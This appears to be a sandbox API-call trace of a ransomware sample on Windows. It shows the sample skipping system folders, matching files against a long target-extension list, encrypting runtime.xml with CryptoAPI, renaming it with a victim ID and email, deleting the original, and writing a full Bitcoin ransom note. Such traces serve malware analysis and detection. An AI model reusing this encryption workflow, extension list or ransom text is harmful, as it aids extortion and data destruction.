	[0174.205] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.205] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.205] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0174.205] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.205] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0174.205] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.205] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.205] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.206] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0174.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.206] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0174.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.206] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0174.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.206] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0174.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0174.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0174.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.208] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0174.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.208] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0174.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.208] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0174.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.208] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0174.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.209] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0174.209] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="..", cAlternateFileName="")) returned 1
	[0174.209] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0174.209] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12ff08c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12ff08c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa134b56b, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0174.209] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0174.209] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0174.209] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\"
	[0174.209] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml"
	[0174.210] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml") returned 97
	[0174.210] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.210] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml") returned 0x61
	[0174.210] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.210] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.210] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"
	[0174.210] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml") returned 97
	[0174.211] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.211] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.211] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0174.211] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.211] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0174.211] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.212] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.212] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.212] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x139, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x139, lpOverlapped=0x0) returned 1
	[0174.216] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.216] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcae68) returned 1
	[0174.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.219] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0174.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.219] CryptHashData (hHash=0xfb9430, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0174.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.219] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9430, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb92b0) returned 1
	[0174.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.220] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x139, dwBufLen=0x139 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x140) returned 1
	[0174.220] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.220] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x139 | out: Destination=0xfdc770) 
	[0174.220] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.220] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x139, dwBufLen=0x140 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x140) returned 1
	[0174.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.221] CryptDestroyKey (hKey=0xfb92b0) returned 1
	[0174.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.221] CryptDestroyHash (hHash=0xfb9430) returned 1
	[0174.221] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.221] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0174.222] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.222] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.222] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.222] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0174.223] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0174.224] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0174.226] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x140, lpOverlapped=0x0) returned 1
	[0174.228] CloseHandle (hObject=0x3a0) returned 1
	[0174.229] CloseHandle (hObject=0x39c) returned 1
	[0174.229] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml")) returned 1
	[0174.232] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml")) returned 0
	[0174.233] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12ff08c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12ff08c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa134b56b, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0174.233] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0174.234] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0174.234] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov"
	[0174.234] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*"
	[0174.234] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.235] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.235] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0174.235] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.235] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0174.235] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0174.238] CloseHandle (hObject=0x390) returned 1
